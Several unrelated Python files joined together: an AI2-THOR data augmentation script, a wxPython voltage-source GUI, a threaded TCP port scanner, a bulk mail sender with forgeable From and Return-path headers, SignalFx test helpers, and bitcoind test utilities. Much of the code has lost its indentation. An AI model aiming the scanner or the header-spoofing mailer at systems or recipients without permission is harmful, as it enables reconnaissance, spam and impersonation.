# store color to object type dictionary
color_to_obj_id_type = {}
all_objects = env.last_event.metadata['objects']
for color, object_id in env.last_event.color_to_object_id.items():
color_to_obj_id_type[str(color)] = object_id
meta_file = os.path.join(root_dir, META_FOLDER, "%09d.json" % im_idx)
with open(meta_file, 'w') as f:
json.dump(color_to_obj_id_type, f)
# print("Total Size: %s" % im_idx)
def run():
'''
replay loop
'''
# start THOR env
env = ThorEnv(player_screen_width=IMAGE_WIDTH,
player_screen_height=IMAGE_HEIGHT)
skipped_files = []
finished = []
cache_file = os.path.join(args.save_path, "cache.json")
while len(traj_list) > 0:
json_file = traj_list.pop()
print ("(%d Left) Augmenting: %s" % (len(traj_list), json_file))
try:
augment_traj(env, json_file)
finished.append(json_file)
with open(cache_file, 'w') as f:
json.dump({'finished': finished}, f)
except Exception as e:
import traceback
traceback.print_exc()
print ("Error: " + repr(e))
print ("Skipping " + json_file)
skipped_files.append(json_file)
env.stop()
print("Finished.")
# skipped files
if len(skipped_files) > 0:
print("Skipped Files:")
print(skipped_files)
traj_list = []
lock = threading.Lock()
# parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', type=str, default="data/2.1.0")
parser.add_argument('--save_path', type=str, default="detector/data/")
parser.add_argument('--smooth_nav', dest='smooth_nav', action='store_true')
parser.add_argument('--time_delays', dest='time_delays', action='store_true')
parser.add_argument('--shuffle', dest='shuffle', action='store_true')
parser.add_argument('--num_threads', type=int, default=1)
parser.add_argument('--reward_config', type=str, default='agents/config/rewards.json')
args = parser.parse_args()
# cache
cache_file = os.path.join(args.save_path, "cache.json")
if os.path.isfile(cache_file):
with open(cache_file, 'r') as f:
finished_jsons = json.load(f)
else:
finished_jsons = {'finished': []}
# make a list of all the traj_data json files
for dir_name, subdir_list, file_list in walklevel(args.data_path, level=2):
if "trial_" in dir_name:
json_file = os.path.join(dir_name, TRAJ_DATA_JSON_FILENAME)
if not os.path.isfile(json_file) or json_file in finished_jsons['finished']:
continue
traj_list.append(json_file)
# random shuffle
if args.shuffle:
random.shuffle(traj_list)
# start threads
run()
# threads = []
# for n in range(args.num_threads):
# thread = threading.Thread(target=run)
# threads.append(thread)
# thread.start()
# time.sleep(1)
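# Example invocation (illustrative; uses the argparse defaults above and assumes
# ALFWORLD_ROOT is exported in the environment):
#   python augment_trajectories.py --data_path data/2.1.0 --save_path detector/data/ --shuffle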
|
ch4_voltage_source.py
|
from functools import partial
from pubsub import pub
from threading import Thread
from time import sleep
import wx
from wx.lib.agw.floatspin import FloatSpin
from spacq.gui.tool.box import load_csv, save_csv, Dialog, MessageDialog
from spacq.interface.units import Quantity
"""
Configuration for a ch4VoltageSource.
"""
class ch4VoltageSourceTunerDialog(Dialog):
"""
A dialog for tuning a voltage source port.
"""
def __init__(self, parent, global_store, ok_callback, port, *args, **kwargs):
Dialog.__init__(self, parent, title='Port {0} tuning'.format(port.num))
self.global_store = global_store
self.ok_callback = ok_callback
self.port = port
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Self-calibration.
calibration_static_box = wx.StaticBox(self, label='DAC self-calibration')
calibration_box = wx.StaticBoxSizer(calibration_static_box, wx.VERTICAL)
dialog_box.Add(calibration_box, flag=wx.EXPAND|wx.ALL, border=5)
self.calibrate_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrate, self.calibrate_button)
calibration_box.Add(self.calibrate_button, flag=wx.EXPAND)
## Tuning.
tuning_static_box = wx.StaticBox(self, label='Tuning')
tuning_box = wx.StaticBoxSizer(tuning_static_box, wx.VERTICAL)
dialog_box.Add(tuning_box, flag=wx.EXPAND)
### Autotune.
autotuning_static_box = wx.StaticBox(self, label='Autotuning')
autotuning_box = wx.StaticBoxSizer(autotuning_static_box, wx.VERTICAL)
tuning_box.Add(autotuning_box, flag=wx.EXPAND|wx.ALL, border=5)
autotuning_sizer = wx.FlexGridSizer(rows=3, cols=2, hgap=5)
autotuning_box.Add(autotuning_sizer, flag=wx.CENTER)
autotuning_sizer.Add(wx.StaticText(self, label='Resource name:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.resource_name_input = wx.TextCtrl(self, size=(300,-1))
autotuning_sizer.Add(self.resource_name_input)
autotuning_sizer.Add(wx.StaticText(self, label='Max:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automax_input = FloatSpin(self, value=1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automax_input)
autotuning_sizer.Add(wx.StaticText(self, label='Min:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automin_input = FloatSpin(self, value=-1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automin_input)
self.autotune_button = wx.Button(self, label='Autotune')
self.Bind(wx.EVT_BUTTON, self.OnAutotune, self.autotune_button)
autotuning_box.Add(self.autotune_button, flag=wx.EXPAND)
### Manual tune.
tuning_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=5)
tuning_box.Add(tuning_sizer, flag=wx.CENTER)
tuning_sizer.Add(wx.StaticText(self, label='Gain:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.gain_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.gain_input)
tuning_sizer.Add(wx.StaticText(self, label='Offset:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.offset_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.offset_input)
## End buttons.
button_box = wx.BoxSizer(wx.HORIZONTAL)
dialog_box.Add(button_box, flag=wx.CENTER|wx.ALL, border=5)
ok_button = wx.Button(self, wx.ID_OK)
self.Bind(wx.EVT_BUTTON, self.OnOk, ok_button)
button_box.Add(ok_button)
cancel_button = wx.Button(self, wx.ID_CANCEL)
button_box.Add(cancel_button)
self.SetSizerAndFit(dialog_box)
def autotune(self, resource):
gain, offset = self.port.autotune(resource, set_result=False,
min_value=self.automin_input.GetValue(),
max_value=self.automax_input.GetValue())
wx.CallAfter(self.gain_input.SetValue, gain)
wx.CallAfter(self.offset_input.SetValue, offset)
wx.CallAfter(self.autotune_button.Enable)
    def self_calibrate(self):
self.port.apply_settings(calibrate=True)
sleep(self.port.calibration_delay)
wx.CallAfter(self.calibrate_button.Enable)
def SetValue(self, gain, offset):
self.gain_input.SetValue(gain)
self.offset_input.SetValue(offset)
def GetValue(self):
return (self.gain_input.GetValue(), self.offset_input.GetValue())
def OnAutotune(self, evt=None):
name = self.resource_name_input.Value
if not name:
MessageDialog(self, 'No resource provided').Show()
return
try:
resource = self.global_store.resources[name]
except KeyError:
MessageDialog(self, name, 'Missing resource').Show()
return
if not resource.readable:
MessageDialog(self, name, 'Unreadable resource').Show()
return
self.autotune_button.Disable()
thr = Thread(target=self.autotune, args=(resource,))
thr.daemon = True
thr.start()
def OnCalibrate(self, evt=None):
self.calibrate_button.Disable()
        thr = Thread(target=self.self_calibrate)
thr.daemon = True
thr.start()
def OnOk(self, evt=None):
self.ok_callback(self)
self.Destroy()
class ch4VoltageSourceSettingsPanel(wx.Panel):
"""
All the settings for a voltage source.
"""
def __init__(self, parent, global_store, vsrc, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.global_store = global_store
self.vsrc = vsrc
self.port_value_inputs = []
self.port_buttons = []
# Panel.
panel_box = wx.BoxSizer(wx.VERTICAL)
## Ports.
ports_box = wx.FlexGridSizer(rows=3, cols=2)
panel_box.Add(ports_box)
for port in range(4):
port_static_box = wx.StaticBox(self, label='Port {0} '.format(port))
port_box = wx.StaticBoxSizer(port_static_box, wx.HORIZONTAL)
ports_box.Add(port_box, flag=wx.ALL, border=5)
spin = FloatSpin(self, value=0, min_val=-10, max_val=10, increment=1, digits=6)
self.port_value_inputs.append(spin)
port_box.Add(spin)
port_box.Add(wx.StaticText(self, label='V'))
set_button = wx.Button(self, label='Set', style=wx.BU_EXACTFIT)
set_button.Bind(wx.EVT_BUTTON, partial(self.OnSetVoltage, port))
port_box.Add(set_button)
tune_button = wx.Button(self, label='Tune...', style=wx.BU_EXACTFIT)
tune_button.Bind(wx.EVT_BUTTON, partial(self.OnTune, port))
port_box.Add(tune_button)
self.port_buttons.append((set_button, tune_button))
## All ports.
button_static_box = wx.StaticBox(self, label='All ports')
button_box = wx.StaticBoxSizer(button_static_box, wx.HORIZONTAL)
panel_box.Add(button_box, flag=wx.CENTER)
### Zero.
zero_all_button = wx.Button(self, label='Zero')
self.Bind(wx.EVT_BUTTON, self.OnZeroAll, zero_all_button)
button_box.Add(zero_all_button, flag=wx.CENTER)
### Self-calibrate.
self.calibrate_all_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrateAll, self.calibrate_all_button)
button_box.Add(self.calibrate_all_button, flag=wx.CENTER)
### Load tuning.
tuning_data_static_box = wx.StaticBox(self, label='Tuning data')
tuning_data_box = wx.StaticBoxSizer(tuning_data_static_box, wx.HORIZONTAL)
button_box.Add(tuning_data_box)
#### Save.
tuning_data_save_button = wx.Button(self, label='Save...')
self.Bind(wx.EVT_BUTTON, self.OnSave, tuning_data_save_button)
tuning_data_box.Add(tuning_data_save_button)
#### Load.
tuning_data_load_button = wx.Button(self, label='Load...')
self.Bind(wx.EVT_BUTTON, self.OnLoad, tuning_data_load_button)
tuning_data_box.Add(tuning_data_load_button)
self.SetSizer(panel_box)
    def self_calibrate_all(self):
delay = 0 # s
for port in self.vsrc.ports:
# Use the largest delay.
if port.calibration_delay > delay:
delay = port.calibration_delay
port.apply_settings(calibrate=True)
sleep(delay)
wx.CallAfter(self.calibrate_all_button.Enable)
def zero_all(self):
for port in self.vsrc.ports:
port.voltage = Quantity(0.0, 'V')
def OnSetVoltage(self, port_num, evt=None):
try:
self.vsrc.ports[port_num].voltage = Quantity(self.port_value_inputs[port_num].GetValue(), 'V')
except ValueError as e:
MessageDialog(self, str(e), 'Invalid value').Show()
def OnTune(self, port_num, evt=None):
port = self.vsrc.ports[port_num]
def ok_callback(dlg):
port.gain, port.offset = dlg.GetValue()
dlg = ch4VoltageSourceTunerDialog(self, self.global_store, ok_callback, port)
dlg.SetValue(port.gain, port.offset)
dlg.Show()
def OnCalibrateAll(self, evt=None):
self.calibrate_all_button.Disable()
        thr = Thread(target=self.self_calibrate_all)
thr.daemon = True
thr.start()
def OnZeroAll(self, evt=None):
thr = Thread(target=self.zero_all)
thr.daemon = True
thr.start()
def OnSave(self, evt=None):
values = [[port.gain, port.offset] for port in self.vsrc.ports]
try:
save_csv(self, values)
except IOError as e:
MessageDialog(self, str(e), 'Save error').Show()
return
def OnLoad(self, evt=None):
try:
result = load_csv(self)
if result is None:
return
has_header, values, _ = result
if has_header:
port_values = values[1:]
else:
port_values = values
if len(port_values) != len(self.vsrc.ports):
raise ValueError('Invalid number of ports.')
for i, port_value in enumerate(port_values):
if len(port_value) != 2:
raise ValueError('Invalid number of settings for port {0}.'.format(i))
try:
float(port_value[0])
float(port_value[1])
except TypeError:
raise ValueError('Not a number for port {0}.'.format(i))
except (IOError, ValueError) as e:
MessageDialog(self, str(e), 'Load error').Show()
return
for port, values in zip(self.vsrc.ports, port_values):
port.gain = float(values[0])
port.offset = float(values[1])
class ch4VoltageSourceSettingsDialog(Dialog):
"""
A wrapper for ch4VoltageSourceSettingsPanel.
"""
def __init__(self, parent, global_store, vsrc_name, *args, **kwargs):
# If the device doesn't exist, give up.
try:
vsrc = global_store.devices[vsrc_name].device
except (KeyError, AttributeError):
self.Destroy()
return
Dialog.__init__(self, parent, title='Four channel voltage source settings', *args, **kwargs)
self.vsrc_name = vsrc_name
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Settings panel.
self.panel = ch4VoltageSourceSettingsPanel(self, global_store, vsrc)
dialog_box.Add(self.panel)
self.SetSizerAndFit(dialog_box)
# Subscriptions.
pub.subscribe(self.msg_device, 'device.added')
pub.subscribe(self.msg_device, 'device.removed')
def msg_device(self, name, value=None):
if name == self.vsrc_name:
# Device has changed, so we can't trust it anymore.
self.Destroy()
return
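# --- Usage sketch (illustrative) ---
# Assuming a running wx App and a global_store whose `devices` mapping holds an
# entry registered under the (hypothetical) name 'vsrc', the settings dialog
# can be opened with:
#   dlg = ch4VoltageSourceSettingsDialog(parent_frame, global_store, 'vsrc')
#   dlg.Show()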
|
port_scanner.py
|
import requests
import socket
import threading
requests.packages.urllib3.disable_warnings() # noqa
class ScanPort:
def __init__(self, target, start_port=None, end_port=None):
self.target = target
self.from_port = start_port
self.to_port = end_port
self.ports = []
def scanner(self, target, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.3)
sock.connect((target, port))
self.ports.append(port)
except Exception as f: # noqa
pass
    def __call__(self, *args, **kwargs):
        if self.from_port is None:
            self.from_port = 1
        if self.to_port is None:
            self.to_port = 10000
        try:
            threads = []
            for port in range(self.from_port, self.to_port + 1):
                t1 = threading.Thread(target=self.scanner, args=[self.target, port])
                t1.start()
                threads.append(t1)
                # throttle: once 50 scans are in flight, wait for them all to finish
                if len(threads) >= 50:
                    for thread in threads:
                        thread.join()
                    threads = []
            # wait for any remaining scans before reporting results
            for thread in threads:
                thread.join()
        except Exception as e: # noqa
            pass
        return self.ports
def scanport(target, start_port=None, end_port=None):
return ScanPort(target, start_port, end_port)()
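# --- Usage sketch (illustrative) ---
# scanport() runs the scan and returns the list of ports that accepted a TCP
# connection; the same list is also available on the instance as `ports`.
#   open_ports = scanport("127.0.0.1", 1, 1024)
#   print(sorted(open_ports))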
|
mail-measure.py
|
# coding: utf-8
import sys
import smtplib
import socket
import time
from email.MIMEText import MIMEText
from PyQt4 import QtGui, uic, QtCore
from multiprocessing import Process
"""
sendmail examples: https://docs.python.org/2/library/email-examples.html
"""
class form(QtGui.QMainWindow):
def __init__(self):
super(form, self).__init__()
self.ui = uic.loadUi('measure.ui', self)
self.show()
self.connect(self.ui.form_start, QtCore.SIGNAL("clicked()"), self.create_jobs)
self.connect(self.ui.form_stop, QtCore.SIGNAL("clicked()"), self.stop_sendmail)
def stop_sendmail(self):
print "terminate"
exit(0)
def create_jobs(self):
print "create_jobs (%s) " % self.ui.mail_total.text()
jobs = list()
mps = int(self.ui.mps.text())
for i in range(int(self.ui.mail_total.text())):
jobs.append(Process(target = self.start_sendmail),)
for job in jobs:
job.start()
if mps == 0:
mps = 1
time.sleep(1.0 / mps)
time.sleep(1.0 / mps)
for job in jobs:
job.join()
def start_sendmail(self):
"""
print self.ui.form_mailserver.text()
print self.ui.form_ehlo.text()
print self.ui.form_mailfrom.text()
print self.ui.form_rcptto.text()
print self.ui.form_subject.text()
print self.ui.form_data.toPlainText()
print self.ui.form_mailfrom_inc.isChecked()
"""
start = time.time()
msg = MIMEText(str(self.ui.form_data.toPlainText()), _charset='euc-kr')
""" subject """
msg['Subject'] = str(self.ui.form_subject.text())
""" from """
ENVFrom = str(self.ui.form_mailfrom.text())
""" rcpt to """
recipients = []
for recipient in str(self.ui.form_rcptto.text()).split(","):
recipients.append(recipient)
#msg['To'] = ", ".join(recipients)
""" header from/to """
if len(str(self.ui.form_headerfrom.text()).strip()) != 0:
msg['From'] = str(self.ui.form_headerfrom.text())
if len(str(self.ui.form_headerto.text()).strip()) != 0:
msg['To'] = str(self.ui.form_headerto.text())
""" return-path """
if len(str(self.ui.form_returnpath.text()).strip()) != 0:
msg['Return-path'] = str(self.ui.form_returnpath.text())
""" reply-to """
if len(str(self.ui.form_replyto.text()).strip()) != 0:
msg['Reply-to'] = str(self.ui.form_replyto.text())
""" x-header """
if len(str(self.ui.form_xheader.toPlainText()).strip()) != 0:
x_header_line = str(self.ui.form_xheader.toPlainText()).split('\n')
for x_header in x_header_line:
msg[x_header.split(':')[0]] = x_header.split(':')[1]
""" smtp server """
try:
s = smtplib.SMTP(str(self.ui.form_mailserver.text()))
except socket.error as e:
print "could not connect: %s" % str(e)
return 0
except smtplib.SMTPConnectError, e:
print "Failure to send email: %s" % str(e)
return 0
""" ehlo """
s.ehlo(str(self.ui.form_ehlo.text()))
#s.starttls()
""" sendmail """
try:
ret = s.sendmail(ENVFrom, recipients, msg.as_string())
s.quit()
# Catch all for SMTP exceptions
except smtplib.SMTPException, e:
print "Failure to send email: %s" % str(e)
end = time.time()
print "successed (%d) " % (end-start)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
w = form()
sys.exit(app.exec_())
|
common.py
|
import os
import re
import subprocess
import threading
import time
from contextlib import contextmanager
from pathlib import Path
import docker
import requests
from tests.helpers import fake_backend
from tests.helpers.util import (
get_docker_client,
get_host_ip,
pull_from_reader_in_background,
retry,
retry_on_ebadf,
run_container,
)
from tests.paths import REPO_ROOT_DIR
PACKAGING_DIR = REPO_ROOT_DIR / "packaging"
DEPLOYMENTS_DIR = REPO_ROOT_DIR / "deployments"
INSTALLER_PATH = DEPLOYMENTS_DIR / "installer/install.sh"
RPM_OUTPUT_DIR = PACKAGING_DIR / "rpm/output/x86_64"
DEB_OUTPUT_DIR = PACKAGING_DIR / "deb/output"
DOCKERFILES_DIR = Path(__file__).parent.joinpath("images").resolve()
WIN_AGENT_LATEST_URL = "https://dl.signalfx.com/windows/{stage}/zip/latest/latest.txt"
WIN_AGENT_PATH = r"C:\Program Files\SignalFx\SignalFxAgent\bin\signalfx-agent.exe"
WIN_REPO_ROOT_DIR = os.path.realpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", ".."))
WIN_INSTALLER_PATH = os.path.join(WIN_REPO_ROOT_DIR, "deployments", "installer", "install.ps1")
WIN_UNINSTALLER_PATH = os.path.join(WIN_REPO_ROOT_DIR, "scripts", "windows", "uninstall-agent.ps1")
INIT_SYSV = "sysv"
INIT_UPSTART = "upstart"
INIT_SYSTEMD = "systemd"
AGENT_YAML_PATH = "/etc/signalfx/agent.yaml"
PIDFILE_PATH = "/var/run/signalfx-agent.pid"
BASIC_CONFIG = """
monitors:
- type: collectd/signalfx-metadata
- type: collectd/cpu
- type: collectd/uptime
"""
def build_base_image(name, path=DOCKERFILES_DIR, dockerfile=None, buildargs=None):
client = get_docker_client()
dockerfile = dockerfile or Path(path) / f"Dockerfile.{name}"
image, _ = client.images.build(
path=str(path), dockerfile=str(dockerfile), pull=True, rm=True, forcerm=True, buildargs=buildargs
)
return image.id
LOG_COMMAND = {
INIT_SYSV: "cat /var/log/signalfx-agent.log",
INIT_UPSTART: "cat /var/log/signalfx-agent.log",
INIT_SYSTEMD: "journalctl -u signalfx-agent",
}
def get_agent_logs(container, init_system):
try:
_, output = container.exec_run(LOG_COMMAND[init_system])
except docker.errors.APIError as e:
print("Error getting agent logs: %s" % e)
return ""
return output
def get_deb_package_to_test():
return get_package_to_test(DEB_OUTPUT_DIR, "deb")
def get_rpm_package_to_test():
return get_package_to_test(RPM_OUTPUT_DIR, "rpm")
def get_package_to_test(output_dir, extension):
pkgs = list(Path(output_dir).glob(f"*.{extension}"))
if not pkgs:
raise AssertionError(f"No .{extension} files found in {output_dir}")
if len(pkgs) > 1:
raise AssertionError(f"More than one .{extension} file found in {output_dir}")
return pkgs[0]
# Run an HTTPS proxy inside the container with socat so that our fake backend
# doesn't have to worry about HTTPS. The cert file must be trusted by the
# container running the agent.
# This is pretty hacky but docker makes it hard to communicate from a container
# back to the host machine (and we don't want to use the host network stack in
# the container due to init systems). The idea is to bind mount a shared
# folder from the test host to the container that two socat instances use to
# communicate using a file to make the bytes flow between the HTTPS proxy and
# the fake backend.
@contextmanager
def socat_https_proxy(container, target_host, target_port, source_host, bind_addr):
cert = "/%s.cert" % source_host
key = "/%s.key" % source_host
socat_bin = DOCKERFILES_DIR / "socat"
stopped = False
socket_path = "/tmp/scratch/%s-%s" % (source_host, container.id[:12])
# Keep the socat instance in the container running across container
# restarts
def keep_running_in_container(cont, sock):
while not stopped:
try:
cont.exec_run(
[
"socat",
"-v",
"OPENSSL-LISTEN:443,cert=%s,key=%s,verify=0,bind=%s,fork" % (cert, key, bind_addr),
"UNIX-CONNECT:%s" % sock,
]
)
except docker.errors.APIError:
print("socat died, restarting...")
time.sleep(0.1)
threading.Thread(target=keep_running_in_container, args=(container, socket_path)).start()
proc = retry_on_ebadf(
lambda: subprocess.Popen(
[socat_bin, "-v", "UNIX-LISTEN:%s,fork" % socket_path, "TCP4:%s:%d" % (target_host, target_port)],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=False,
)
)()
get_local_out = pull_from_reader_in_background(proc.stdout)
try:
yield
finally:
stopped = True
# The socat instance in the container will die with the container
proc.kill()
print(get_local_out())
@contextmanager
def run_init_system_image(
base_image,
with_socat=True,
path=DOCKERFILES_DIR,
dockerfile=None,
ingest_host="ingest.us0.signalfx.com", # Whatever value is used here needs a self-signed cert in ./images/certs/
api_host="api.us0.signalfx.com", # Whatever value is used here needs a self-signed cert in ./images/certs/
command=None,
buildargs=None,
): # pylint: disable=too-many-arguments
image_id = retry(lambda: build_base_image(base_image, path, dockerfile, buildargs), docker.errors.BuildError)
print("Image ID: %s" % image_id)
if with_socat:
backend_ip = "127.0.0.1"
else:
backend_ip = get_host_ip()
with fake_backend.start(ip_addr=backend_ip) as backend:
container_options = {
# Init systems running in the container want permissions
"privileged": True,
"volumes": {
"/sys/fs/cgroup": {"bind": "/sys/fs/cgroup", "mode": "ro"},
"/tmp/scratch": {"bind": "/tmp/scratch", "mode": "rw"},
},
"extra_hosts": {
# Socat will be running on localhost to forward requests to
# these hosts to the fake backend
ingest_host: backend.ingest_host,
api_host: backend.api_host,
},
}
if command:
container_options["command"] = command
with run_container(image_id, wait_for_ip=True, **container_options) as cont:
# Workaround for https://bugzilla.redhat.com/show_bug.cgi?id=1769831 which
# causes yum/dnf to exit with error code 141 when importing GPG keys.
cont.exec_run("mkdir -p /run/user/0")
if with_socat:
# Proxy the backend calls through a fake HTTPS endpoint so that we
# don't have to change the default configuration default by the
# package. The base_image used should trust the self-signed certs
# default in the images dir so that the agent doesn't throw TLS
# verification errors.
with socat_https_proxy(
cont, backend.ingest_host, backend.ingest_port, ingest_host, "127.0.0.1"
), socat_https_proxy(cont, backend.api_host, backend.api_port, api_host, "127.0.0.2"):
yield [cont, backend]
else:
yield [cont, backend]
@retry_on_ebadf
def is_agent_running_as_non_root(container):
code, output = container.exec_run("pgrep -u signalfx-agent signalfx-agent")
print("pgrep check: %s" % output)
return code == 0
@retry_on_ebadf
def get_agent_version(cont):
code, output = cont.exec_run("signalfx-agent -version")
output = output.decode("utf-8").strip()
assert code == 0, "command 'signalfx-agent -version' failed:\n%s" % output
match = re.match("^.+?: (.+)?,", output)
assert match and match.group(1).strip(), "failed to parse agent version from command output:\n%s" % output
return match.group(1).strip()
def run_win_command(cmd, returncodes=None, shell=True, **kwargs):
if returncodes is None:
returncodes = [0]
print('running "%s" ...' % cmd)
proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=shell, close_fds=False, **kwargs)
output = proc.stdout.decode("utf-8")
if returncodes:
assert proc.returncode in returncodes, output
print(output)
return proc
def get_win_agent_version(agent_path=WIN_AGENT_PATH):
proc = run_win_command([agent_path, "-version"])
output = proc.stdout.decode("utf-8")
match = re.match("^.+?: (.+)?,", output)
assert match and match.group(1).strip(), "failed to parse agent version from command output:\n%s" % output
return match.group(1).strip()
def running_in_azure_pipelines():
return os.environ.get("AZURE_HTTP_USER_AGENT") is not None
def has_choco():
return run_win_command("choco --version", []).returncode == 0
def uninstall_win_agent():
run_win_command(f'powershell.exe "{WIN_UNINSTALLER_PATH}"')
def get_latest_win_agent_version(stage="final"):
return requests.get(WIN_AGENT_LATEST_URL.format(stage=stage)).text.strip()
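# --- Usage sketch (illustrative) ---
# run_init_system_image is a context manager: it builds the named base image
# (a Dockerfile.<name> must exist under DOCKERFILES_DIR) and yields the running
# container together with the fake ingest/API backend. The image name below is
# hypothetical.
#   with run_init_system_image("ubuntu1804") as [cont, backend]:
#       code, output = cont.exec_run("signalfx-agent -version")
#       assert code == 0, output.decode("utf-8")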
|
utils.py
|
import binascii
import logging
import os
import re
import sqlite3
import subprocess
import threading
import time
from bitcoin.rpc import RawProxy as BitcoinProxy
BITCOIND_CONFIG = {
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"rpcport": 57776,
}
LIGHTNINGD_CONFIG = {
"bitcoind-poll": "1s",
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"locktime-blocks": 5,
}
DEVELOPER = os.getenv("DEVELOPER", "0") == "1"
def write_config(filename, opts):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.cmd_line = None
self.env = os.environ
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
if self.proc.returncode:
raise ValueError("Process '{}' did not cleanly shutdown: return code {}".format(self.proc.pid, rc))
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
with self.logs_cond:
self.logs.append(str(line.rstrip()))
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=60):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=60):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
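# --- Subclass sketch (illustrative) ---
# TailableProc is meant to be subclassed: a subclass only needs to set
# `self.cmd_line` and `self.prefix` before start() is called, e.g.
#   class EchoD(TailableProc):
#       def __init__(self, output_dir):
#           TailableProc.__init__(self, output_dir)
#           self.cmd_line = ['yes', 'hello']
#           self.prefix = 'echod'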
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
f = lambda *args: proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/root/.chips", rpcport=57776):
TailableProc.__init__(self, bitcoin_dir)
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'chipsd'
self.cmd_line = [
'chipsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-regtest',
'-logtimestamps',
'-nolisten',
]
BITCOIND_CONFIG['rpcport'] = rpcport
        regtestdir = os.path.join(bitcoin_dir, 'regtest')
        if not os.path.exists(regtestdir):
            os.makedirs(regtestdir)
        btc_conf_file = os.path.join(regtestdir, 'chips.conf')
write_config(os.path.join(bitcoin_dir, 'chips.conf'), BITCOIND_CONFIG)
write_config(btc_conf_file, BITCOIND_CONFIG)
self.rpc = SimpleBitcoinProxy(btc_conf_file=btc_conf_file)
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=60)
logging.info("BitcoinD started")
def generate_block(self, numblocks=1):
# As of 0.16, generate() is removed; use generatetoaddress.
self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
